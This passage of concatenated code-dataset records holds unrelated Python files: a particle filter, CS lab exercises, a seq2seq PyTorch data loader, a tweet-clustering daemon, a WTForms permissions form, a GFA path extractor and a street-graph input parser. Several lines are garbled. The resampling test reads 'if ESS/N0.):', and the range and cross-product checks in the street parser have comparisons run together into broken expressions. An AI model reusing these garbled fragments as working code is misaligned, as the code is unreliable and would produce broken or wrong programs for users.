'systematic_resampling':systematic_resampling}\n return pf_settings\n\n\ndef pf(Y,N,params,distributions,pf_settings):\n '''\n perform pf inference, returning particles, noise, weights and ancestory\n '''\n\n rel_var_est = pf_settings['rel_var_est']\n likelihood_only = pf_settings['likelihood_only']\n systematic_resampling = pf_settings['systematic_resampling']\n ess_threshold = pf_settings['ess_threshold']\n occasional_obs = pf_settings['occasional_obs']\n propagation_freq = pf_settings['propagation_freq']\n\n if systematic_resampling:\n from cython.resampling import systematic_resampling\n resampling_method = systematic_resampling\n else:\n resampling_method = choice_resampling\n\n # define local params and distributions\n sample_particles = distributions.sample_particles\n sample_particles_initial = distributions.sample_particles_initial\n log_inc_weight = distributions.log_inc_weight\n log_inc_weight_initial = distributions.log_inc_weight_initial\n\n\n # initialise arrays\n n,D = Y.shape\n log_Z = np.zeros(n)\n \n # initial sampling, weighting and resampling\n Xt,eps0 = sample_particles_initial(N,Y[0,],params)\n _,Dx = Xt.shape\n\n # initialise larger arrays if needing more than likelihood evaluations\n if not likelihood_only:\n A = np.empty((n,N),dtype=int)\n log_w = np.empty((n,N))\n W = np.empty_like(log_w)\n if occasional_obs:\n X = np.empty((n,propagation_freq,N,Dx))\n eps = np.empty((n,propagation_freq,N,Dx))\n else:\n X = np.empty((n,N,Dx))\n eps = np.empty((n,N,Dx))\n \n # optionally estimate relative variance\n if rel_var_est:\n V_collect = np.zeros(n)\n E = np.arange(N)\n V_collect[0] = 0\n\n # initial likelihood calculation\n log_w0 = log_inc_weight_initial(Xt,Y[0,],params)\n log_Zt,Wt = process_pf_weights(log_w0,-np.log(N)*np.ones(N))\n log_Z[0] = log_Zt\n\n # resample depending on ess\n At,log_W_tm1 = resample_particles(Wt,ess_threshold,resampling_method,N)\n\n # need to reshape so its a format ready for propagation at the first pf iteration\n if occasional_obs:\n Xt = Xt.reshape((1,N,Dx))\n eps0 = eps0.reshape((1,N,Dx))\n\n # optionally store initial values\n if not likelihood_only:\n X[0,] = Xt\n eps[0,] = eps0\n log_w[0,] = log_w0\n W[0,] = Wt\n A[0,] = At\n\n # iterate through time\n for t in range(1,n):\n\n # optionally estimate relative variance\n if rel_var_est:\n E = E[At]\n psi,_=np.histogram(E,np.arange(N))\n mstar = (N/(float(N)-1))**t * (1-np.sum((psi/float(N))**2)) * (N**2/float(N*(N-1)))\n V_collect[t] = 1-mstar\n\n # sample particles\n if not occasional_obs:\n Xt,epst = sample_particles(Xt[At,],Y[t,],params)\n log_wt = log_inc_weight(Xt,Y[t,],params)\n else:\n Xt,epst = 
sample_particles(Xt[-1,At,],Y[t,],params,propagation_freq)\n log_wt = log_inc_weight(Xt[-1,],Y[t,],params)\n\n # evaluate weights\n log_Zt,Wt = process_pf_weights(log_wt,log_W_tm1)\n log_Z[t] = log_Zt\n\n # resample\n At,log_W_tm1 = resample_particles(Wt,ess_threshold,resampling_method,N)\n\n # optionally store initial values\n if not likelihood_only:\n X[t,] = Xt\n eps[t,] = epst\n log_w[t,] = log_wt\n W[t,] = Wt\n A[t,] = At\n\n # return results depending on settings\n if likelihood_only and rel_var_est:\n return log_Z,V_collect\n elif likelihood_only and not rel_var_est:\n return log_Z\n elif not likelihood_only and rel_var_est:\n return log_Z,X,W,log_w,eps,A,V_collect\n elif not likelihood_only and not rel_var_est:\n return log_Z,X,W,log_w,eps,A\n \n\n\n \ndef resample_particles(Wt,ess_threshold,resampling_method,N):\n '''\n resample particles depending on ess\n '''\n ESS = 1./np.sum(Wt**2)\n log_W_tm1 = np.zeros(N)\n if ESS/N0.):\n At = resampling_method(Wt)\n log_W_tm1 = np.log(N**-1)\n else:\n At = range(N)\n log_W_tm1[~np.isclose(Wt,0)] = np.log(Wt[~np.isclose(Wt,0)]) \n log_W_tm1[np.isclose(Wt,0)] = -np.inf\n\n return At,log_W_tm1 \n\n\ndef process_pf_weights(log_w,log_W_tm1):\n '''\n return conditional likelihood and normalised weights\n '''\n \n log_weighted_inc = log_w + log_W_tm1\n maxlog_w = np.max(log_weighted_inc)\n Wscaled = np.exp(log_weighted_inc-maxlog_w)\n sum_Wscaled = np.sum(Wscaled)\n log_Zt = np.log(sum_Wscaled)+maxlog_w\n Wnormalised = Wscaled/sum_Wscaled\n return log_Zt,Wnormalised\n\n\ndef choice_resampling(W):\n '''\n simple wrapper for multinomial resampling\n '''\n assert W.ndim==1\n N = W.shape[0]\n return np.random.choice(range(N),N,p=W,replace=True)\n\n\n\n\n\n","sub_path":"pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"436029312","text":"\"\"\" Optional problems for Lab 3 \"\"\"\n\ndef is_prime(n):\n \"\"\"Returns True if n is a prime number and False otherwise.\n\n >>> is_prime(2)\n True\n >>> is_prime(16)\n False\n >>> is_prime(521)\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n \"give a positive integer n and m,count from 1 to m ,the number can be divided by n\"\n def countzero(n,m):\n assert n >0 and m> 0 ,\"n,m are positive\"\n inc=0\n if m==1:\n return 1\n if n%m==0:\n inc=1\n return inc+countzero(n,m-1)\n if countzero(n,n) ==2:\n return True\n return False\n\ndef gcd(a, b):\n \"\"\"Returns the greatest common divisor of a and b.\n Should be implemented using recursion.\n\n >>> gcd(34, 19)\n 1\n >>> gcd(39, 91)\n 13\n >>> gcd(20, 30)\n 10\n >>> gcd(40, 40)\n 40\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n if max(a,b)%min(a,b)==0:\n return min(a,b)\n return gcd(min(a,b),max(a,b)%min(a,b))\n\ndef ten_pairs(n):\n \"\"\"Return the number of ten-pairs within positive integer n.\n\n >>> ten_pairs(7823952)\n 3\n >>> ten_pairs(55055)\n 6\n >>> ten_pairs(9641469)\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def countdigits(n,x):\n assert x <10 ,\"x < 10\"\n if n<10:\n if n == x:\n return 1\n return 0\n if n%10 == x:\n return 1+countdigits(n//10,x)\n return countdigits(n//10,x)\n\n if n<=10:\n return 0\n elif n<100:\n if n%10 + n//10 == 10:\n return 1\n if n%10 == 0:\n return ten_pairs(n//10)\n return ten_pairs(n//10)+countdigits(n//10,10-n%10)","sub_path":"lab03/lab03_extra.py","file_name":"lab03_extra.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"60805970","text":"from operator import itemgetter\nfrom typing import Dict, List, Tuple\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom constants import PAD, BOS, EOS, UNK\n\n\nclass Seq2seqDataset(Dataset):\n def __init__(self,\n path: str,\n source_word_to_id: Dict[str, int],\n target_word_to_id: Dict[str, int],\n seq_lim:int = 30\n ) -> None:\n self.source_word_to_id = source_word_to_id\n self.target_word_to_id = target_word_to_id\n self.seq_lim = seq_lim\n self.sources, self.targets = self._load(path)\n\n def __len__(self) -> int:\n return len(self.sources)\n\n def __getitem__(self,\n idx: int\n ) -> Tuple[List, List, List, List, List]:\n source = self.sources[idx]\n source_mask = [1] * len(source)\n target = self.targets[idx]\n target_input, target_output = target[0], target[1]\n target_mask = [1] * len(target[0])\n return source, source_mask, target_input, target_output, target_mask\n\n def _load(self,\n path: str,\n delimiter: str = '\\t'\n ) -> Tuple[List, List]:\n sources, targets = [], []\n with open(path) as f:\n for line in f:\n former, latter = line.strip().split(delimiter)\n source_ids: List[int] = []\n for mrph in former.split():\n if mrph in self.source_word_to_id.keys():\n source_ids.append(self.source_word_to_id[mrph])\n else:\n source_ids.append(UNK)\n sources.append(source_ids)\n\n target_inp_ids: List[int] = []\n target_out_ids: List[int] = []\n for mrph in latter.split():\n if mrph in self.target_word_to_id.keys():\n target_inp_ids.append(self.target_word_to_id[mrph])\n target_out_ids.append(self.target_word_to_id[mrph])\n else:\n target_inp_ids.append(UNK)\n target_out_ids.append(UNK)\n if self.seq_lim is not None and len(target_inp_ids) > self.seq_lim:\n target_inp_ids = target_inp_ids[-self.seq_lim:]\n target_out_ids = target_out_ids[-self.seq_lim:]\n target_inp_ids.insert(0, BOS)\n target_out_ids.append(EOS)\n targets.append([target_inp_ids, target_out_ids])\n return sources, targets\n\n\nclass Seq2seqDataLoader(DataLoader):\n def __init__(self,\n path: str,\n source_word_to_id: Dict[str, int],\n target_word_to_id: Dict[str, int],\n batch_size: int,\n shuffle: bool,\n num_workers: int\n ) -> None:\n self.dataset = Seq2seqDataset(path, source_word_to_id, target_word_to_id)\n self.n_samples = len(self.dataset)\n super(Seq2seqDataLoader, self).__init__(self.dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=seq2seq_collate_fn)\n\n\ndef seq2seq_collate_fn(batch: List[Tuple]\n ) -> Tuple[torch.LongTensor, torch.LongTensor,\n torch.LongTensor, torch.LongTensor, torch.LongTensor]:\n sources, source_masks, target_inputs, target_outputs, target_masks = [], [], [], [], []\n cache = [(len(sample[0]), len(sample[2])) for sample in batch]\n max_source_length = max(cache, key=itemgetter(0))[0]\n max_target_length = max(cache, key=itemgetter(1))[1]\n for sample in batch:\n source, source_mask, target_input, target_output, target_mask = sample\n source_length, target_length = len(source), len(target_input)\n\n source_padding = [PAD] * (max_source_length - source_length)\n sources.append(source + source_padding)\n source_mask_padding = [0] * (max_source_length - source_length)\n source_masks.append(source_mask + source_mask_padding)\n\n target_padding = [PAD] * (max_target_length - target_length)\n target_inputs.append(target_input+target_padding)\n target_outputs.append(target_output+target_padding)\n target_mask_padding = [0] * (max_target_length - target_length)\n target_masks.append(target_mask + 
target_mask_padding)\n return torch.LongTensor(sources), torch.LongTensor(source_masks), \\\n torch.LongTensor(target_inputs), torch.LongTensor(target_outputs), torch.LongTensor(target_masks)\n","sub_path":"src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"429998911","text":"from clustering.gsdpmm.gsdpmm_stream_ifd_dynamic import GSDPMMStreamIFDDynamic\nfrom utils.multiprocess_utils import CustomDaemonProcess\nimport multiprocessing as mp\n\n\nclass ClusterDaemonProcess(CustomDaemonProcess):\n def __init__(self, pidx=0):\n CustomDaemonProcess.__init__(self, pidx)\n self.outq2 = mp.Queue()\n \n def start(self, func):\n self.process = mp.Process(target=func, args=(self.inq, self.outq, self.outq2))\n self.process.daemon = True\n self.process.start()\n\n\nEND_PROCESS = -1\nINPUT_TWARR = 0\nSET_PARAMS = 1\ncluster_daemon = ClusterDaemonProcess()\n\n\ndef clustering(inq, outq, outq_list):\n clusterer = BackCluster()\n while True:\n command = inq.get()\n if command == INPUT_TWARR:\n tw_batch = inq.get()\n clusterer.input_twarr(tw_batch, outq_list)\n elif command == SET_PARAMS:\n params = inq.get()\n clusterer.set_parameters(*params)\n elif command == END_PROCESS:\n outq.put('ending')\n return\n else:\n print('no such command')\n\n\ndef send_simple_message(command, arg, receive):\n cluster_daemon.set_input(command)\n if arg:\n cluster_daemon.set_input(arg)\n if receive:\n return cluster_daemon.get_output()\n\n\ndef start_pool(hold_batch_num, batch_size, alpha, beta):\n cluster_daemon.start(clustering)\n send_simple_message(SET_PARAMS, arg=(hold_batch_num, batch_size, alpha, beta), receive=False)\n\n\ndef wait():\n send_simple_message(END_PROCESS, arg=None, receive=True)\n cluster_daemon.end()\n\n\ndef input_twarr_batch(tw_batch):\n if tw_batch:\n send_simple_message(INPUT_TWARR, arg=tw_batch, receive=False)\n\n\ndef wait_until_get_cluid_twarr_list():\n return cluster_daemon.outq2.get()\n\n\ndef try_get_cluid_twarr_list():\n cluid_twarr_list = None\n while cluster_daemon.outq2.qsize() > 0:\n cluid_twarr_list = wait_until_get_cluid_twarr_list()\n return cluid_twarr_list\n\n\nclass BackCluster:\n def __init__(self):\n self.read_batch_num = self.hist_len = 0\n self.hold_batch_num = self.batch_size = None\n self.gsdpmm = GSDPMMStreamIFDDynamic()\n self.tweet_pool = list()\n \n def set_parameters(self, hold_batch_num, batch_size, alpha, beta):\n self.hold_batch_num, self.batch_size = hold_batch_num, batch_size\n self.gsdpmm.set_hyperparams(alpha, beta)\n \n def input_twarr(self, twarr, out_channel):\n twarr = self.gsdpmm.filter_dup_id(twarr)\n self.tweet_pool.extend(twarr)\n n = len(twarr)\n self.hist_len += n\n print(' -> new {} tw, current pool: {}, hist len: {}'.format(n, len(self.tweet_pool), self.hist_len))\n while len(self.tweet_pool) >= self.batch_size:\n self.input_batch(self.tweet_pool[:self.batch_size])\n self.tweet_pool = self.tweet_pool[self.batch_size:]\n self.output(out_channel)\n \n def input_batch(self, tw_batch):\n self.read_batch_num += 1\n print(' - read batch num: {}'.format(self.read_batch_num))\n params = [\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_STORE, iter_num=None),\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_FULL, iter_num=25),\n dict(tw_batch=tw_batch, action=GSDPMMStreamIFDDynamic.ACT_SAMPLE, iter_num=3)\n ]\n hbn, rbn, = self.hold_batch_num, self.read_batch_num\n param = params[0 if rbn < hbn else 
1 if rbn == hbn else 2]\n self.gsdpmm.input_batch(**param)\n \n def output(self, out_channel):\n hbn, rbn = self.hold_batch_num, self.read_batch_num\n interval, twnum_thres = 5, 4\n if not (rbn >= hbn and (rbn - hbn) % interval == 0):\n return\n print('new list generated, hbn={}, rbn={}'.format(hbn, rbn))\n cluid_twarr_list = self.gsdpmm.get_cluid_twarr_list(twnum_thres)\n if cluid_twarr_list:\n out_channel.put(cluid_twarr_list)\n\n\nif __name__ == '__main__':\n import utils.tweet_keys as tk\n import utils.array_utils as au\n import utils.pattern_utils as pu\n import utils.timer_utils as tmu\n import calling.back_extractor as bext\n import utils.file_iterator as fi\n import utils.function_utils as fu\n fi.mkdir('/home/nfs/cdong/tw/src/calling/tmp', remove_previous=True)\n \n tmu.check_time()\n _hold_batch_num = 100\n _batch_size = 100\n _alpha, _beta = 30, 0.01\n # _alpha, _beta = 50, 0.005\n _file = \"./filtered_twarr.json\"\n _twarr = fu.load_array(_file)[:10200]\n start_pool(_hold_batch_num, _batch_size, _alpha, _beta)\n input_twarr_batch(_twarr)\n \n print('---> waiting for _cluid_cluster_list')\n while True:\n _cluid_cluster_list = cluster_daemon.outq2.get()\n print(' - some thing returned, type :{}'.format(type(_cluid_cluster_list)))\n if _cluid_cluster_list is not None:\n break\n print('---> get _cluid_cluster_list, len:{}'.format(len(_cluid_cluster_list)))\n \n _ext_pool_size = 10\n bext.start_pool(_ext_pool_size)\n bext.input_cluid_twarr_list(_cluid_cluster_list)\n print('waiting for cic outputs')\n _cic_list = bext.get_batch_output()\n print('get cic outputs, type:{}'.format(type(_cic_list)))\n for cic in _cic_list:\n twnum = len(cic.twarr)\n _geo_list = [geo['address'] for geo in cic.od['geo_infer'] if geo['quality'] == 'locality']\n print('cluid:{}, twarr len:{}'.format(cic.cluid, twnum))\n print(cic.od['summary']['keywords'])\n print(_geo_list)\n print('\\n')\n \n if len(_geo_list) == 0:\n _top_geo = 'NOGPE'\n else:\n _top_geo = '`'.join(_geo_list)\n _out_file = '/home/nfs/cdong/tw/src/calling/tmp/id{}_tw{}_{}.txt'.format(cic.cluid, twnum, _top_geo)\n _txtarr = [tw[tk.key_text] for tw in cic.twarr]\n _idx_g, _txt_g = au.group_similar_items(_txtarr, score_thres=0.3, process_num=20)\n _txt_g = [sorted(g, key=lambda t: len(t), reverse=True) for g in _txt_g]\n _txtarr = au.merge_array(_txt_g)\n fu.write_lines(_out_file, _txtarr)\n \n tmu.check_time()\n","sub_path":"calling/back_cluster.py","file_name":"back_cluster.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"429763142","text":"from wtforms.validators import Required\nfrom wtforms.fields import BooleanField, FormField\n\nfrom .forms import BaseForm\nfrom .member import NewForm as BaseNewMemberForm\nfrom atst.domain.permission_sets import PermissionSets\nfrom atst.forms.fields import SelectField\nfrom atst.utils.localization import translate\n\n\nclass PermissionsForm(BaseForm):\n perms_app_mgmt = BooleanField(\n translate(\"forms.new_member.app_mgmt.label\"),\n default=False,\n description=translate(\"forms.new_member.app_mgmt.description\"),\n )\n perms_funding = BooleanField(\n translate(\"forms.new_member.funding.label\"),\n default=False,\n description=translate(\"forms.new_member.funding.description\"),\n )\n perms_reporting = BooleanField(\n translate(\"forms.new_member.reporting.label\"),\n default=False,\n description=translate(\"forms.new_member.reporting.description\"),\n )\n perms_portfolio_mgmt = BooleanField(\n 
translate(\"forms.new_member.portfolio_mgmt.label\"),\n default=False,\n description=translate(\"forms.new_member.portfolio_mgmt.description\"),\n )\n\n @property\n def data(self):\n _data = super().data\n _data.pop(\"csrf_token\", None)\n perm_sets = []\n\n if _data[\"perms_app_mgmt\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_APPLICATION_MANAGEMENT)\n\n if _data[\"perms_funding\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_FUNDING)\n\n if _data[\"perms_reporting\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_REPORTS)\n\n if _data[\"perms_portfolio_mgmt\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_ADMIN)\n\n _data[\"permission_sets\"] = perm_sets\n return _data\n\n\nclass NewForm(PermissionsForm):\n user_data = FormField(BaseNewMemberForm)\n\n\nclass AssignPPOCForm(PermissionsForm):\n role_id = SelectField(\n label=translate(\"forms.assign_ppoc.dod_id\"),\n validators=[Required()],\n choices=[(\"\", \"- Select -\")],\n )\n","sub_path":"atst/forms/portfolio_member.py","file_name":"portfolio_member.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"329634850","text":"\nimport copy\ndef multiplier1 ( m= 1, source = [ 1, 2, 3]) :\n result = copy.copy(source)\n for i, x in enumerate(source) :\n result[i] = result[i] * m\n return result\n\n\ndef multiplier ( m= 1, source = [ 1, 2, 3]) :\n result = list(source)\n for i, x in enumerate(source) :\n result[i] = result[i] * m\n\n return result\n\na = [10, 10, 20, 50]\nprint(multiplier(5))\nprint(multiplier(12, [1, 2]))\nprint(multiplier(3, a))\nprint(a)\n","sub_path":"Practice/o.dagestanski/H_work6/Hw6_task2.py","file_name":"Hw6_task2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"520327720","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the plusMinus function below.\r\ndef plusMinus(arr):\r\n count_p=0\r\n count_n=0\r\n count_zero=0\r\n for i in arr:\r\n if i>0:\r\n count_p+=1\r\n elif i==0:\r\n count_zero+=1\r\n else:\r\n count_n+=1\r\n ratio_p=round(count_p/len(arr),6)\r\n ratio_n=round(count_n/len(arr),6)\r\n ratio_zero=round(count_zero/len(arr),6)\r\n print(ratio_p)\r\n print(ratio_n)\r\n print(ratio_zero)\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n plusMinus(arr)\r\n","sub_path":"Problem Solving/Algorithms/Plus Minus.py","file_name":"Plus Minus.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309939493","text":"import sys\r\nimport argparse\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nfrom Graph import Graph, Node\r\n\r\n'''\r\nUsage: python this.py GFA regionLength(bp)\r\n'''\r\n\r\ndef readGFA(gfaFile):\r\n gfa = open(gfaFile).read().split('\\n')[:-1]\r\n \r\n nodesSeq = dict()\r\n edges = list()\r\n for line in gfa:\r\n if line[0] == 'S':\r\n fields = line.split('\\t')\r\n nodesSeq[fields[1]] = fields[2]\r\n elif line[0] == 'L':\r\n fields = line.split('\\t')\r\n node1 = fields[1]\r\n node1dir = fields[2]\r\n node2 = fields[3]\r\n node2dir = fields[4]\r\n ovlp = int(fields[5][:-1])\r\n node1len = int(fields[6])\r\n node2len = int(fields[7])\r\n edges.append((node1, node1dir, node2, node2dir, ovlp, node1len, node2len))\r\n\r\n G = Graph()\r\n nxg = 
nx.Graph()\r\n for node1, node1dir, node2, node2dir, ovlp, node1len, node2len in edges:\r\n if node1 not in G.nodemap:\r\n n1_seq = nodesSeq[node1]\r\n assert(len(n1_seq) == node1len)\r\n n1 = Node(node1, node1len, n1_seq)\r\n else:\r\n n1 = G.nodemap[node1]\r\n if node2 not in G.nodemap:\r\n n2_seq = nodesSeq[node2]\r\n assert(len(n2_seq) == node2len)\r\n n2 = Node(node2, node1len, n2_seq)\r\n else:\r\n n2 = G.nodemap[node2]\r\n G.addEdge(n1, node1dir, n2, node2dir, ovlp)\r\n nxg.add_node(node1)\r\n nxg.add_node(node2)\r\n nxg.add_edge(node1, node2)\r\n return G, nxg\r\n\r\ndef get_connected_components(graph):\r\n connected_components = []\r\n nodes = list(graph.nodes())\r\n\r\n while len(nodes)!=0:\r\n start_node = nodes.pop()\r\n queue = [start_node] #FIFO\r\n visited = [start_node]\r\n while len(queue)!=0:\r\n start = queue[0]\r\n queue.remove(start)\r\n neighbours = list(graph.neighbors(start))\r\n #print(neighbours)\r\n for neighbour in neighbours:\r\n if neighbour not in visited:\r\n queue.append(neighbour)\r\n visited.append(neighbour)\r\n nodes.remove(neighbour)\r\n connected_components.append(visited)\r\n \r\n return connected_components\r\n\r\n\r\ndef divide(graph):\r\n components = get_connected_components(graph)\r\n print('Found', len(components), 'connected components', file=sys.stderr)\r\n return components\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('gfa', type = str, help = 'Input GFA graph file.')\r\n args = parser.parse_args()\r\n\r\n G, nxg = readGFA(args.gfa)\r\n #components = divide(nxg) \r\n print(\"Start computing paths..\", file=sys.stderr)\r\n paths = G.getAllPaths()\r\n print(\"Computed %d paths.\" % len(paths), file=sys.stderr)\r\n paths_between_tips = defaultdict(list)\r\n for path in paths:\r\n first_node = path[0][0]\r\n last_node = path[-1][0]\r\n if first_node < last_node:\r\n paths_between_tips[(first_node, last_node)].append(path)\r\n else:\r\n paths_between_tips[(last_node, first_node)].append(path)\r\n\r\n hap_count = 0\r\n for (tip1, tip2), paths in paths_between_tips.items():\r\n paths_with_lengths = sorted([(G.getPathSeqLength(path), path) for path in paths], key=lambda entry: entry[0])\r\n print('Found %d paths between %s and %s, longest sequence length %d' % (len(paths_with_lengths), tip1, tip2, paths_with_lengths[-1][0]), file=sys.stderr)\r\n longest_path = paths_with_lengths[-1][1]\r\n hap_count += 1\r\n input_file_name_prefix = \"_\".join(args.gfa.split(\"/\")[-1].split(\".\")[:-1])\r\n print('>%s_hap%d' % (input_file_name_prefix, hap_count))\r\n print(G.getPathSeq(longest_path))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"paftest/GFAextract_sequence.py","file_name":"GFAextract_sequence.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"219046445","text":"import sys\nimport re\nimport hashlib\n# YOUR CODE GOES HERE\nclass Line(object):\n def __init__ (self, src, dst):\n self.src = src\n self.dst = dst\n\n def __str__(self):\n return '<' +str(self.src.index) + ',' + str(self.dst.index) + '>' \n\nclass Point(object):\n def __init__ (self, x, y,name):\n self.x = float(x)\n self.y = float(y)\n self.name = str(name)\n self.index = hashlib.sha1('(' + str(pp(self.x)) + ',' + str(pp(self.y))+ ')'.encode(\"UTF-8\")).hexdigest()[:4]\n def __str__ (self):\n return str(self.index)+': '+'(' + str(pp(self.x)) + ',' + str(pp(self.y))+ ')'\ndef pp(x):\n \"\"\"Returns a pretty-print string representation 
of a number.\n A float number is represented by an integer, if it is whole,\n and up to two decimal places if it isn't\n \"\"\"\n if isinstance(x, float):\n if x.is_integer():\n return str(int(x))\n else:\n return \"{0:.2f}\".format(x)\n return str(x)\nclass Distance(object):\n def __init__(self, index, distance):\n self.index = index\n self.distance = distance\n\n @classmethod\n def sort_key(cls, key):\n if key == 'distance':\n return lambda obj: obj.distance\n elif key == 'index':\n return lambda obj: obj.index\n\n\ndef out_of_range(x1, y1, x2, y2, x3, y3, x4, y4, xcoor, ycoor,name,test):\n xbig = first_bigger_second(x1,x2)\n ybig = first_bigger_second(y1,y2)\n xbig2 = first_bigger_second(x3,x4)\n ybig2 = first_bigger_second(y3,y4)\n xsmall = first_smaller_second(x1,x2)\n ysmall = first_smaller_second(y1,y2)\n xsmall2 = first_smaller_second(x3,x4)\n ysmall2 = first_smaller_second(y3,y4)\n\n if (xcoor>xbig) or (xcoorxbig2) or (xcoorybig) or (ycoorybig2) or (ycoor= second):\n return first;\n if (first < second):\n return second\n\ndef first_smaller_second ( first, second):\n if (first >= second):\n return second;\n if (first < second):\n return first\n\ndef cross_product(p1, p2, p3): \n x1 = p3.x - p1.x;\n y1 = p3.y - p1.y;\n\n x2 = p2.x - p1.x;\n y2 = p2.y - p1.y;\n cross = x1 * y2 - y1 * x2;\n\n if cross ==0:\n xbig = first_bigger_second(p1.x,p2.x)\n ybig = first_bigger_second(p1.y,p2.y)\n xsmall = first_smaller_second(p1.x,p2.x)\n ysmall = first_smaller_second(p1.y,p2.y)\n if (p3.x>xbig) or (p3.xybig) or (p3.yAdd c->Change r->Remove g->Graph\n# parser state 9 Represents that an \n# appropiate command has been recieved\n# parameter: String input\n#########################################\n###########PARSER STATE MACHINE###########\ndef Parser(line):\n parser_state=0\n test_points=[]\n name=\"\"\n sign_flag=0\n number_flag=0\n space_flag=0\n pointx=\"\"\n pointy=\"\"\n command=0\n point_list=[]\n for len_input in range(0,len(line),1): \n#########State 0#########\n if parser_state==0:\n x=line[len_input]\n if x ==\" \":\n pass\n elif x.isalpha():\n if x==\"a\" or x==\"c\":\n command=x \n parser_state = 1 #Go Next\n elif x==\"r\":\n command=x\n parser_state = 11 #Go Next\n elif x==\"g\":\n command=x \n if len_input==len(line)-2:\n parser_state = 9 #Go Next\n else:\n parser_state = 14 #Go Next \n else:\n sys.stderr.write( \"Error: Command not recognized.\\n\" )\n break \n\n else:\n sys.stderr.write( \"Error: Command not recognized.\\n\" )\n break \n########ADD/CHANGE COMMAND########\n###State 1###\n elif parser_state==1:\n if line[len_input]==\" \":\n parser_state = 2 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: Missing required arguments.\\n\" )\n else:\n sys.stderr.write( \"Error: Add a space between command and arguments.\\n\" )\n break\n###State 2###\n elif parser_state==2:\n if line[len_input]==\" \":\n pass\n elif line[len_input]=='\"':\n parser_state = 3 #Go Next\n name=\"\"\n else:\n sys.stderr.write( \"Error: needed name argument use format: 'Street Name'.\\n\" )\n break\n###State 3###\n elif parser_state==3:\n x=line[len_input]\n if x.isalpha():\n name+=line[len_input]\n elif x.isdigit():\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n elif line[len_input]!='\"' and line[len_input]!=' ':\n sys.stderr.write( \"Error: wrong command format.\\n\" )\n break\n elif line[len_input]=='\"':\n if len(name)>=1:\n parser_state = 4 #Go Next\n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n 
break\n elif line[len_input]==\" \":\n name+=line[len_input] \n else:\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n###State 4###\n elif parser_state==4:\n \n if line[len_input]==\" \":\n parser_state = 5 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: Missing required arguments.\\n\" )\n else:\n sys.stderr.write(\"Error: Space nedded between 'Name'argument and coordinates (x,y).\\n\" )\n break\n###State 5###\n elif parser_state==5:\n if line[len_input]==\" \":\n pass\n elif line[len_input]==\"(\":\n parser_state=6 #Go Next\n else:\n sys.stderr.write( \"Error: needed coordinates (x,y).\\n\" )\n break\n###State 6###\n\n elif parser_state==6:\n if line[len_input]==\" \":\n if number_flag==1 or sign_flag==1:\n space_flag=1\n else:\n pass\n elif line[len_input]==\"-\":\n if sign_flag==0 and space_flag==0:\n pointx+=line[len_input]\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif line[len_input].isdigit():\n if space_flag==0:\n pointx+=line[len_input] \n number_flag=1\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif line[len_input]==\",\":\n if(number_flag==1):\n parser_state = 7 #Go Next \n sign_flag=0\n space_flag=0\n number_flag=0\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n###State 7###\n elif parser_state==7:\n if line[len_input]==\" \":\n if number_flag==1 or sign_flag==1:\n space_flag=1\n else:\n pass\n elif len_input==len(line)-2:\n if line[len_input]==\")\":\n if(number_flag==1):\n test_points.append('('+str(pointx)+','+str(pointy)+')')\n pointx=\"\"\n pointy=\"\"\n sign_flag=0\n space_flag=0\n number_flag=0\n parser_state = 9 #Go Next\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break \n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n if line[len_input]==\"-\":\n if sign_flag==0:\n pointy+=line[len_input]\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif 